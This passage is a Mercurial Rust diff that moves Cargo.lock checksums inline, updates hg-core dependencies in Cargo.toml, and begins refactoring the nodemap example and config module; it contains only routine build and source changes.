"a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f" [[package]] name = "strsim" version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8ea5119cdb4c55b55d432abb513a0429384878c15dde60cc77b1c99de1a95a6a" [[package]] name = "syn" version = "1.0.54" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9a2af957a63d6bd42255c359c93d9bfdb97076bd3b820897ce55ffbfbf107f44" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", + "quote", + "unicode-xid", ] [[package]] name = "tempfile" version = "3.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7a6e24d9338a0a5be79593e2fa15a648add6138caa803e2d5bc782c371732ca9" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", - "redox_syscall 0.1.57 (registry+https://github.com/rust-lang/crates.io-index)", - "remove_dir_all 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", + "libc", + "rand 0.7.3", + "redox_syscall", + "remove_dir_all", + "winapi", ] [[package]] name = "termcolor" version = "1.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2dfed899f0eb03f32ee8c6a0aabdb8a7949659e3466561fc0adf54e26d88c5f4" dependencies = [ - "winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi-util", ] [[package]] name = "textwrap" version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d326610f408c7a4eb6f51c37c330e496b08506c9457c9d34287ecc38809fb060" dependencies = [ - "unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)", + "unicode-width", ] [[package]] name = "thread_local" version = "1.0.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d40c6d1b69745a6ec6fb1ca717914848da4b44ae29d9b3080cbee91d72a69b14" dependencies = [ - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "lazy_static", ] [[package]] name = "time" version = "0.1.44" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "wasi 0.10.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "wasi 0.10.0+wasi-snapshot-preview1", + "winapi", ] [[package]] name = "twox-hash" version = "1.6.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "04f8ab788026715fa63b31960869617cba39117e520eb415b0139543e325ab59" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", - "static_assertions 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", + "rand 0.7.3", + "static_assertions", ] [[package]] name = "typenum" version = "1.12.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "373c8a200f9e67a0c95e62a4f52fbf80c23b4381c05a17845531982fa99e6b33" [[package]] name = "unicode-width" version = "0.1.8" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3" [[package]] name = "unicode-xid" version = "0.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f7fe0bb3479651439c9112f72b6c505038574c9fbb575ed1bf3b797fa39dd564" + +[[package]] +name = "users" +version = "0.11.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "24cc0f6d6f267b73e5a2cadf007ba8f9bc39c6a6f9666f8cf25ea809a153b032" +dependencies = [ + "libc", + "log", +] [[package]] name = "vcpkg" version = "0.2.11" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b00bca6106a5e23f3eee943593759b7fcddb00554332e856d990c893966879fb" [[package]] name = "vec_map" version = "0.8.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191" [[package]] name = "version_check" version = "0.9.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b5a972e5669d67ba988ce3dc826706fb0a8b01471c088cb0b6110b805cc36aed" [[package]] name = "wasi" version = "0.9.0+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519" [[package]] name = "wasi" version = "0.10.0+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f" [[package]] name = "winapi" version = "0.3.9" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" dependencies = [ - "winapi-i686-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi-x86_64-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi-i686-pc-windows-gnu", + "winapi-x86_64-pc-windows-gnu", ] [[package]] name = "winapi-i686-pc-windows-gnu" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" [[package]] name = "winapi-util" version = "0.1.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "70ec6ce85bb158151cae5e5c87f95a8e97d2c0c4b001223f33a334e3ce5de178" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "winapi-x86_64-pc-windows-gnu" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" [[package]] name = "zstd" version = "0.5.3+zstd.1.4.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "01b32eaf771efa709e8308605bbf9319bf485dc1503179ec0469b611937c0cd8" dependencies = [ - "zstd-safe 2.0.5+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)", + "zstd-safe", ] [[package]] name = "zstd-safe" version = "2.0.5+zstd.1.4.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1cfb642e0d27f64729a639c52db457e0ae906e7bc6f5fe8f5c453230400f1055" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "zstd-sys 1.4.17+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "zstd-sys", ] [[package]] name = "zstd-sys" version = "1.4.17+zstd.1.4.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b89249644df056b522696b1bb9e7c18c87e8ffa3e2f0dc3b0155875d6498f01b" dependencies = [ - "cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)", - "glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)", - "itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "cc", + "glob", + "itertools", + "libc", ] - -[metadata] -"checksum adler 0.2.3 (registry+https://github.com/rust-lang/crates.io-index)" = "ee2a4ec343196209d6594e19543ae87a39f96d5534d7174822a3ad825dd6ed7e" -"checksum aho-corasick 0.7.15 (registry+https://github.com/rust-lang/crates.io-index)" = "7404febffaa47dac81aa44dba71523c9d069b1bdc50a77db41195149e17f68e5" -"checksum ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ee49baf6cb617b853aa8d93bf420db2383fab46d314482ca2803b40d5fde979b" -"checksum atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)" = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8" -"checksum autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)" = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a" -"checksum bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "cf1de2fe8c75bc145a2f577add951f8134889b4795d47466a54a5c846d691693" -"checksum bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "031043d04099746d8db04daf1fa424b2bc8bd69d92b25962dcde24da39ab64a2" -"checksum byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)" = "08c48aae112d48ed9f069b33538ea9e3e90aa263cfa3d1c24309612b1f7472de" -"checksum cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)" = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48" -"checksum cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)" = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822" -"checksum cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" -"checksum clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)" = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002" -"checksum const_fn 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)" = "cd51eab21ab4fd6a3bf889e2d0958c0a6e3a61ad04260325e919e652a2a62826" -"checksum cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "bfaf3847ab963e40c4f6dd8d6be279bdf74007ae2413786a0dcbb28c52139a95" -"checksum crc32fast 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "81156fece84ab6a9f2afdb109ce3ae577e42b1228441eded99bd77f627953b1a" -"checksum crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)" = "b153fe7cbef478c567df0f972e02e6d736db11affe43dfc9c56a9374d1adfb87" -"checksum crossbeam-channel 0.5.0 (registry+https://github.com/rust-lang/crates.io-index)" = "dca26ee1f8d361640700bde38b2c37d8c22b3ce2d360e1fc1c74ea4b0aa7d775" -"checksum crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)" = "94af6efb46fef72616855b036a624cf27ba656ffc9be1b9a3c931cfc7749a9a9" -"checksum crossbeam-epoch 0.9.1 (registry+https://github.com/rust-lang/crates.io-index)" = "a1aaa739f95311c2c7887a76863f500026092fb1dce0161dab577e559ef3569d" -"checksum crossbeam-utils 0.7.2 (registry+https://github.com/rust-lang/crates.io-index)" = "c3c7c73a2d1e9fc0886a08b93e98eb643461230d5f1925e4036204d5f2e261a8" -"checksum crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)" = "02d96d1e189ef58269ebe5b97953da3274d83a93af647c2ddd6f9dab28cedb8d" -"checksum ctor 0.1.16 (registry+https://github.com/rust-lang/crates.io-index)" = "7fbaabec2c953050352311293be5c6aba8e141ba19d6811862b232d6fd020484" -"checksum difference 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "524cbf6897b527295dff137cec09ecf3a05f4fddffd7dfcd1585403449e74198" -"checksum either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457" -"checksum env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)" = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36" -"checksum flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)" = "7411863d55df97a419aa64cb4d2f167103ea9d767e2c54a1868b7ac3f6b47129" -"checksum format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)" = "1a7374eb574cd29ae45878554298091c554c3286a17b3afa440a3e2710ae0790" -"checksum format-bytes-macros 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "4edcc04201cea17a0e6b937adebd46b93fba09924c7e6ed8c515a35ce8432cbc" -"checksum fuchsia-cprng 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)" = "a06f77d526c1a601b7c4cdd98f54b5eaabffc14d5f2f0296febdc7f357c6d3ba" -"checksum gcc 0.3.55 (registry+https://github.com/rust-lang/crates.io-index)" = "8f5f3913fa0bfe7ee1fd8248b6b9f42a5af4b9d65ec2dd2c3c26132b950ecfc2" -"checksum getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)" = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6" -"checksum glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574" -"checksum hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)" = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8" -"checksum hex 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "644f9158b2f133fd50f5fb3242878846d9eb792e445c893805ff0e3824006e35" -"checksum humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f" -"checksum im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f" -"checksum itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b" -"checksum jobserver 0.1.21 (registry+https://github.com/rust-lang/crates.io-index)" = "5c71313ebb9439f74b00d9d2dcec36440beaf57a6aa0623068441dd7cd81a7f2" -"checksum lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646" -"checksum libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)" = "1482821306169ec4d07f6aca392a4681f66c75c9918aa49641a2595db64053cb" -"checksum libz-sys 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "602113192b08db8f38796c4e85c39e960c145965140e918018bcde1952429655" -"checksum log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)" = "4fabed175da42fed1fa0746b0ea71f412aa9d35e76e95e59b192c64b9dc2bf8b" -"checksum maybe-uninit 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "60302e4db3a61da70c0cb7991976248362f30319e88850c487b9b95bbf059e00" -"checksum memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)" = "0ee1c47aaa256ecabcaea351eae4a9b01ef39ed810004e298d2511ed284b1525" -"checksum memmap 0.7.0 (registry+https://github.com/rust-lang/crates.io-index)" = "6585fd95e7bb50d6cc31e20d4cf9afb4e2ba16c5846fc76793f11218da9c475b" -"checksum memoffset 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "157b4208e3059a8f9e78d559edc658e13df41410cb3ae03979c83130067fdd87" -"checksum micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "2620153e1d903d26b72b89f0e9c48d8c4756cba941c185461dddc234980c298c" -"checksum micro-timer-macros 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e28a3473e6abd6e9aab36aaeef32ad22ae0bd34e79f376643594c2b152ec1c5d" -"checksum miniz_oxide 0.4.3 (registry+https://github.com/rust-lang/crates.io-index)" = "0f2d26ec3309788e423cfbf68ad1800f061638098d76a83681af979dc4eda19d" -"checksum num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)" = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290" -"checksum num_cpus 1.13.0 (registry+https://github.com/rust-lang/crates.io-index)" = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3" -"checksum output_vt100 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "53cdc5b785b7a58c5aad8216b3dfa114df64b0b06ae6e1501cef91df2fbdf8f9" -"checksum pkg-config 0.3.19 (registry+https://github.com/rust-lang/crates.io-index)" = "3831453b3449ceb48b6d9c7ad7c96d5ea673e9b470a1dc578c2ce6521230884c" -"checksum ppv-lite86 0.2.10 (registry+https://github.com/rust-lang/crates.io-index)" = "ac74c624d6b2d21f425f752262f42188365d7b8ff1aff74c82e45136510a4857" -"checksum pretty_assertions 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "3f81e1644e1b54f5a68959a29aa86cde704219254669da328ecfdf6a1f09d427" -"checksum proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)" = "dbf0c48bc1d91375ae5c3cd81e3722dff1abcf81a30960240640d223f59fe0e5" -"checksum proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)" = "1e0704ee1a7e00d7bb417d0770ea303c1bccbabf0ef1667dae92b5967f5f8a71" -"checksum python27-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "67cb041de8615111bf224dd75667af5f25c6e032118251426fed7f1b70ce4c8c" -"checksum python3-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "90af11779515a1e530af60782d273b59ac79d33b0e253c071a728563957c76d4" -"checksum quick-error 1.2.3 (registry+https://github.com/rust-lang/crates.io-index)" = "a1d01941d82fa2ab50be1e79e6714289dd7cde78eba4c074bc5a4374f650dfe0" -"checksum quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)" = "aa563d17ecb180e500da1cfd2b028310ac758de548efdd203e18f283af693f37" -"checksum rand 0.3.23 (registry+https://github.com/rust-lang/crates.io-index)" = "64ac302d8f83c0c1974bf758f6b041c6c8ada916fbb44a609158ca8b064cc76c" -"checksum rand 0.4.6 (registry+https://github.com/rust-lang/crates.io-index)" = "552840b97013b1a26992c11eac34bdd778e464601a4c2054b5f0bff7c6761293" -"checksum rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)" = "6a6b1679d49b24bbfe0c803429aa1874472f50d9b363131f0e89fc356b544d03" -"checksum rand_chacha 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f4c8ed856279c9737206bf725bf36935d8666ead7aa69b52be55af369d193402" -"checksum rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "7a6fdeb83b075e8266dcc8762c22776f6877a63111121f5f8c7411e5be7eed4b" -"checksum rand_core 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "9c33a3c44ca05fa6f1807d8e6743f3824e8509beca625669633be0acbdf509dc" -"checksum rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)" = "90bde5296fc891b0cef12a6d03ddccc162ce7b2aff54160af9338f8d40df6d19" -"checksum rand_distr 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)" = "96977acbdd3a6576fb1d27391900035bf3863d4a16422973a409b488cf29ffb2" -"checksum rand_hc 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ca3129af7b92a17112d59ad498c6f81eaf463253766b90396d39ea7a39d6613c" -"checksum rand_pcg 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "16abd0c1b639e9eb4d7c50c0b8100b0d0f849be2349829c740fe8e6eb4816429" -"checksum rand_xoshiro 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "a9fcdd2e881d02f1d9390ae47ad8e5696a9e4be7b547a1da2afbc61973217004" -"checksum rayon 1.5.0 (registry+https://github.com/rust-lang/crates.io-index)" = "8b0d8e0819fadc20c74ea8373106ead0600e3a67ef1fe8da56e39b9ae7275674" -"checksum rayon-core 1.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9ab346ac5921dc62ffa9f89b7a773907511cdfa5490c572ae9be1be33e8afa4a" -"checksum rdrand 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "678054eb77286b51581ba43620cc911abf02758c91f93f479767aed0f90458b2" -"checksum redox_syscall 0.1.57 (registry+https://github.com/rust-lang/crates.io-index)" = "41cc0f7e4d5d4544e8861606a285bb08d3e70712ccc7d2b84d7c0ccfaf4b05ce" -"checksum regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "38cf2c13ed4745de91a5eb834e11c00bcc3709e773173b2ce4c56c9fbde04b9c" -"checksum regex-syntax 0.6.21 (registry+https://github.com/rust-lang/crates.io-index)" = "3b181ba2dcf07aaccad5448e8ead58db5b742cf85dfe035e2227f137a539a189" -"checksum remove_dir_all 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)" = "3acd125665422973a33ac9d3dd2df85edad0f4ae9b00dafb1a05e43a9f5ef8e7" -"checksum rust-crypto 0.2.36 (registry+https://github.com/rust-lang/crates.io-index)" = "f76d05d3993fd5f4af9434e8e436db163a12a9d40e1a58a726f27a01dfd12a2a" -"checksum rustc-serialize 0.3.24 (registry+https://github.com/rust-lang/crates.io-index)" = "dcf128d1287d2ea9d80910b5f1120d0b8eede3fbf1abe91c40d39ea7d51e6fda" -"checksum same-file 1.0.6 (registry+https://github.com/rust-lang/crates.io-index)" = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502" -"checksum scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd" -"checksum sized-chunks 0.6.2 (registry+https://github.com/rust-lang/crates.io-index)" = "1ec31ceca5644fa6d444cc77548b88b67f46db6f7c71683b0f9336e671830d2f" -"checksum static_assertions 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f" -"checksum strsim 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)" = "8ea5119cdb4c55b55d432abb513a0429384878c15dde60cc77b1c99de1a95a6a" -"checksum syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)" = "9a2af957a63d6bd42255c359c93d9bfdb97076bd3b820897ce55ffbfbf107f44" -"checksum tempfile 3.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "7a6e24d9338a0a5be79593e2fa15a648add6138caa803e2d5bc782c371732ca9" -"checksum termcolor 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "2dfed899f0eb03f32ee8c6a0aabdb8a7949659e3466561fc0adf54e26d88c5f4" -"checksum textwrap 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "d326610f408c7a4eb6f51c37c330e496b08506c9457c9d34287ecc38809fb060" -"checksum thread_local 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)" = "d40c6d1b69745a6ec6fb1ca717914848da4b44ae29d9b3080cbee91d72a69b14" -"checksum time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)" = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255" -"checksum twox-hash 1.6.0 (registry+https://github.com/rust-lang/crates.io-index)" = "04f8ab788026715fa63b31960869617cba39117e520eb415b0139543e325ab59" -"checksum typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)" = "373c8a200f9e67a0c95e62a4f52fbf80c23b4381c05a17845531982fa99e6b33" -"checksum unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)" = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3" -"checksum unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "f7fe0bb3479651439c9112f72b6c505038574c9fbb575ed1bf3b797fa39dd564" -"checksum vcpkg 0.2.11 (registry+https://github.com/rust-lang/crates.io-index)" = "b00bca6106a5e23f3eee943593759b7fcddb00554332e856d990c893966879fb" -"checksum vec_map 0.8.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191" -"checksum version_check 0.9.2 (registry+https://github.com/rust-lang/crates.io-index)" = "b5a972e5669d67ba988ce3dc826706fb0a8b01471c088cb0b6110b805cc36aed" -"checksum wasi 0.10.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)" = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f" -"checksum wasi 0.9.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)" = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519" -"checksum winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)" = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" -"checksum winapi-i686-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" -"checksum winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)" = "70ec6ce85bb158151cae5e5c87f95a8e97d2c0c4b001223f33a334e3ce5de178" -"checksum winapi-x86_64-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" -"checksum zstd 0.5.3+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "01b32eaf771efa709e8308605bbf9319bf485dc1503179ec0469b611937c0cd8" -"checksum zstd-safe 2.0.5+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "1cfb642e0d27f64729a639c52db457e0ae906e7bc6f5fe8f5c453230400f1055" -"checksum zstd-sys 1.4.17+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "b89249644df056b522696b1bb9e7c18c87e8ffa3e2f0dc3b0155875d6498f01b" diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -9,11 +9,12 @@ name = "hg" [dependencies] +bytes-cast = "0.1" byteorder = "1.3.4" -hex = "0.4.2" +derive_more = "0.99" +home = "0.5" im-rc = "15.0.*" lazy_static = "1.4.0" -memchr = "2.3.3" rand = "0.7.3" rand_pcg = "0.2.1" rand_distr = "0.2.2" @@ -27,7 +28,7 @@ memmap = "0.7.0" zstd = "0.5.3" rust-crypto = "0.2.36" -format-bytes = "0.1.2" +format-bytes = "0.2.2" # We don't use the `miniz-oxide` backend to not change rhg benchmarks and until # we have a clearer view of which backend is the fastest. @@ -40,9 +41,3 @@ clap = "*" pretty_assertions = "0.6.1" tempfile = "3.1.0" - -[features] -# Use a (still unoptimized) tree for the dirstate instead of the current flat -# dirstate. This is not yet recommended for performance reasons. A future -# version might make it the default, or make it a runtime option. -dirstate-tree = [] diff --git a/rust/hg-core/examples/nodemap/main.rs b/rust/hg-core/examples/nodemap/main.rs --- a/rust/hg-core/examples/nodemap/main.rs +++ b/rust/hg-core/examples/nodemap/main.rs @@ -49,7 +49,7 @@ fn query(index: &Index, nm: &NodeTree, prefix: &str) { let start = Instant::now(); - let res = nm.find_hex(index, prefix); + let res = NodePrefix::from_hex(prefix).map(|p| nm.find_bin(index, p)); println!("Result found in {:?}: {:?}", start.elapsed(), res); } @@ -66,7 +66,7 @@ .collect(); if queries < 10 { let nodes_hex: Vec<String> = - nodes.iter().map(|n| n.encode_hex()).collect(); + nodes.iter().map(|n| format!("{:x}", n)).collect(); println!("Nodes: {:?}", nodes_hex); } let mut last: Option<Revision> = None; @@ -76,11 +76,11 @@ } let elapsed = start.elapsed(); println!( - "Did {} queries in {:?} (mean {:?}), last was {:?} with result {:?}", + "Did {} queries in {:?} (mean {:?}), last was {:x} with result {:?}", queries, elapsed, elapsed / (queries as u32), - nodes.last().unwrap().encode_hex(), + nodes.last().unwrap(), last ); } diff --git a/rust/hg-core/src/config.rs b/rust/hg-core/src/config.rs --- a/rust/hg-core/src/config.rs +++ b/rust/hg-core/src/config.rs @@ -11,4 +11,6 @@ mod config; mod layer; -pub use config::Config; +mod values; +pub use config::{Config, ConfigValueParseError}; +pub use layer::{ConfigError, ConfigParseError}; diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -8,25 +8,44 @@ // GNU General Public License version 2 or any later version. use super::layer; -use crate::config::layer::{ConfigError, ConfigLayer, ConfigValue}; -use std::path::PathBuf; +use super::values; +use crate::config::layer::{ + ConfigError, ConfigLayer, ConfigOrigin, ConfigValue, +}; +use crate::utils::files::get_bytes_from_os_str; +use crate::utils::SliceExt; +use format_bytes::{write_bytes, DisplayBytes}; +use std::collections::HashSet; +use std::env; +use std::fmt; +use std::path::{Path, PathBuf}; +use std::str; -use crate::operations::find_root; -use crate::utils::files::read_whole_file; +use crate::errors::{HgResultExt, IoResultExt}; /// Holds the config values for the current repository /// TODO update this docstring once we support more sources +#[derive(Clone)] pub struct Config { layers: Vec<layer::ConfigLayer>, } -impl std::fmt::Debug for Config { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { +impl DisplayBytes for Config { + fn display_bytes( + &self, + out: &mut dyn std::io::Write, + ) -> std::io::Result<()> { for (index, layer) in self.layers.iter().rev().enumerate() { - write!( - f, - "==== Layer {} (trusted: 